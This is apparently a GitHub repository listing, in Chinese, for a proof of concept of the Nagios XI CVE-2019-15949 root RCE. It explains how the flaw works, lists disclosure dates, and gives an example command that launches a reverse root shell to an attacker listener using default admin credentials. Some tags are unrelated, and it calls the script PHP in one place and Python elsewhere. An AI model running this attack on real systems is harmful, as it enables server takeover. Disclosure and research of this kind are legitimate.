plur1bu5/Nagios-CVE-2019-15949-RCE

GitHub: plur1bu5/Nagios-CVE-2019-15949-RCE

针对 Nagios XI 5.6.5 及以下版本 CVE-2019-15949 远程代码执行漏洞的 Python 验证脚本,通过插件管理权限实现 root 提权。

Stars: 0 | Forks: 0

# Nagios-CVE-2019-15949-RCE-Poc 针对 CVE-2019-15949 的 Python PoC ## 概述 Nagios XI <= 5.6.5 中存在一个漏洞,允许攻击者利用 RCE 将权限提升至 root。 该漏洞利用需要以 'nagios' 用户身份访问服务器,或者通过 Web 界面访问 CCM 并拥有管理插件的权限。 ## 详情 在下载系统配置文件 (profile.php?cmd=download) 时会调用 getprofile.sh 脚本,该脚本通过无需密码的 sudo 条目以 root 权限执行;该脚本会执行 'check_plugin' 可执行文件,而该文件归 nagios 用户所有。登录 Nagios XI 并拥有修改插件权限的用户,或者服务器上的 'nagios' 用户,可以修改 'check_plugin' 可执行文件并注入恶意命令,这些命令将以 root 权限执行。 ## POC 已开发出一个 PHP POC,它上传一个 payload 从而实现反弹 root shell。 用法: ```python3 exploit.py targetIp [ssl=false/true] username password Lhost lport``` 示例: ```python3 exploit.py 10.10.11.9 false nagiosadmin admin 10.10.11.14 4444``` ## 披露 向 Nagios 报告时间:2019 年 7 月 29 日 Nagios 确认时间:2019 年 7 月 29 日 修复版本:5.6.6,发布于:2019 年 8 月 20 日 CVE 分配时间:2019 年 9 月 6 日 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)
标签:Capture The Flag, CSV导出, CVE-2019-15949, Exploit-Dev, Nagios XI, Nagios 漏洞, PE 加载器, Python PoC, RCE, Root Shell, Web报告查看器, 协议分析, 本地提权, 权限提升, 编程工具, 网络安全, 远程代码执行, 逆向Shell, 隐私保护